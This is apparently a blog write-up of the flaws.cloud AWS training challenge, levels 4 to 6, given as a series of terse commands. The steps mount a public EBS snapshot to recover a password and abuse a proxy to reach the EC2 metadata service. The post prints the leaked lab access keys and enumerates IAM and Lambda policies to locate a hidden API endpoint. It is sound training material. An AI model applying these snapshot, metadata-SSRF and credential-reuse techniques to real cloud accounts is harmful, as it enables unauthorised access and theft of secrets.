AWS Security(S3 buckets, ec2 snapshots, leaked AWS keys, permissions to read IAM policies)

flaws.cloud challenge

http://flaws.cloud/

Challenge 4:

URL: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

  • It asks for creds that we don’t have.
  • A snapshot of this instance was created after deploying.
  • Challenge is to access this ec2 instance.
  1. Snapshots- It is given that snapshot is created for this instance. Snapshots can be made public, which poses a huge risk.
aws --profile terraform  ec2 describe-snapshots --region us-west-2 --filters "Name=volume-size,Values=8" "Name=status,Values=completed" "Name=storage-tier,Values=standard" > us-west-2_8GiB_standardtier.txt
aws --profile flaws sts get-caller-identity
aws --profile terraform  ec2 describe-snapshots --owner-id 975426262029 --region us-west-2
aws --profile terraform ec2 create-volume --region us-west-2  --snapshot-id  snap-0b49342abd1bdcb89 --availability-zone us-west-2c
fdisk -l
/dev/xvdf
mkdir /mnt/volume_ext
lsblk -f
mount -t ext4 /dev/xvdf1  /mnt/volume_ext
flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
Authorization: Basic Zmxhd3M6bkNQOHhpZ2RqcGp5aVhnSjduSnU3cnc1Um82OGlFOE0=
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/example.com/

Challenge 5:

We are provided with a HTTP web proxy server that is running on an ec2 instance.

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/<your website>/http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/example.com/
http://169.254.169.254/latest/meta-data/
"AccessKeyId" : "ASIA6GG7PSQGYRUEDGDO",
"SecretAccessKey" : "oqzfuYcxUnzlDPiIU/LLrlvOUYseSzZCShqgLHK3",
aws --profile flaws_lvl5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/

Challenge 6:

We are provided with aws creds. It is specified SecurityAudit policy is attached to this account.

aws --profile flaws_lvl6 iam get-user
aws --profile flaws_lvl6 sts get-caller-identity
aws --profile flaws_lvl6 iam list-attached-user-policies --user-name Level6
aws --profile flaws_lvl6 iam get-policy  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
aws --profile flaws_lvl6 iam get-policy-version  --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
aws --region us-west-2 --profile level6 lambda list-functions
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
  • restapi_id
  • region(we already know)
  • stage_name
aws --region us-west-2 --profile flaws_lvl6 lambda get-policy --function-name Level6
  • restapi_id: s33ppypa75
aws --profile flaws_lvl6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
  • stage_name: Prod
https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
n00🔑

n00🔑

135 Followers

Tries to understand computers. I know little bit of most things. Definitely not an expert. Usually plays HTB (ID-23862). https://www.linkedin.com/in/pswalia2u/